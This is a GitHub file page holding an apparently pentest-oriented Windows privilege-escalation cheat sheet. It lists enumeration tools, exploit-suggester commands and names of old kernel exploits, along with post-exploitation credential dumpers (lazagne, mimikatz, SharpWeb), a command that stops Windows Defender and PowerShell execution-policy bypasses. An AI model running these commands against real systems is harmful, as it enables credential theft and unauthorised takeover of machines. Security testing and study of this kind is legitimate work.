forked from Gimpy42/CheatSheet
-
Notifications
You must be signed in to change notification settings - Fork 2
/
wpe
67 lines (53 loc) · 1.5 KB
/
wpe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
# Windows Priviledge Escalation
# Enumeration
# General Scanning tool
winPEAS.exe
winPEAS.bat
windows-privesc-check2.exe
Seatbelt.exe -group=all
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
Powerless.bat
# Search for CVE
systeminfo > sysinfo.txt
python windows-exploit-suggester.py --database <DATE>-mssb.xlsx -i sysinfo.txt
sudo docker run --rm -it -v `pwd`:/data wes
systeminfo > systeminfo.txt
wmic qfe > qfe.txt
python wes.py -u
python wes.py systeminfo.txt qfe.txt
powershell -exec bypass -command "& { Import-Module .\Sherlock.ps1; Find-AllVulns; }"
# Look for:
cheat autorun
cheat name_pipe
cheat AlwaysInstallElevated
cheat executable_files
cheat startup_app
cheat weak_service_permission
cheat unquoted_service_paths
cheat hot_potato
cheat CVE
# Common exploit
KiTrap0D (KB979682)
MS11-011 (KB2393802)
MS10-059 (KB982799)
MS10-021 (KB979683)
MS11-080 (KB2592799)
# Post exploitation
lazagne.exe all
SharpWeb.exe
mimikatz.exe
# Usefull command
# Disable windows defender
sc stop WinDefend
# Bypass restriction
powershell -nop -ep bypass
# List hidden files
dir /a
# Find a file
dir /b/s "<FILE>"
# Methodology to follow
https://guif.re/windowseop
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
https://mysecurityjournal.blogspot.com/p/client-side-attacks.html
http://www.fuzzysecurity.com/tutorials/16.html
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md